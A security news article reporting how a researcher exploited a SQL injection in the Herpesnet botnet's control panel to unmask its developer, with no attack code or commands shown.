Access member only content, take part in discussions with comments on blogs, news and reviews and receive all the latest security industry news directly to your inbox. Join now for free.
Processing registration... Please wait.
This process can take up to a minute to complete.
A confirmation email has been sent to your email address - SUPPLIED EMAIL HERE. Please click on the link in the email to verify your email address. You need to verify your email before you can start posting.
If you do not receive your confirmation email within the next few minutes, it may be because the email has been captured by a junk mail filter. Please ensure you add the domain @scmagazine.com.au to your white-listed senders.
A security researcher has decompiled the Herpesnet botnet and exploited the network to out its developer.
The Herpesnet developer using the alias Frk7 spread the bot over Twitter and security forums to sell subscriptions to the service.
Reverse engineer and penetration tester Paul Rascagneres (RootBSD) examined the bot and found and exploited a time-based SQL injection in the command and control client.
That served database tables and later allowed Rascagneres to upload Metaspolit's Meterpreter payload to open a shell on the developer's machine.
Rascagneres discovered what he said was a string of personal information including the owners real identity and Facebook account.
The owner was reported by Rascagneres to be an 18 year old Italian man. The details matched with the bio of the Herpesnet Twitter account.
The botnet's website was taken offline and a war of words ensued between Rascagneres and the developer
Frk7 claimed to have done "nothing illegal" and had sold the bot to pay for tuition.
The Secure Domain Foundation, a self-described "public benefit, non-profit, malicious domain slaughter house" chimed in via Twitter and quipped: "Lesson of the day. If you are selling botnet related services, don't directly tie it to your real name ".
A Google web cache page on 19 May indicated the network controlled 9827 bots and had 1947 users.
A technical write up can be read on Malware.lu, a small outfit of security boffins dedicated to malware analysis.
Copyright © SC Magazine, Australia
To begin commenting right away, you can log in below or register an account if you don't yet have one. Please read our guidelines on commenting. Offending posts will be removed and your access may be suspended. Abusive or obscene language will not be tolerated. The comments below do not necessarily reflect the views or opinions of SC Magazine, Haymarket Media or its employees.
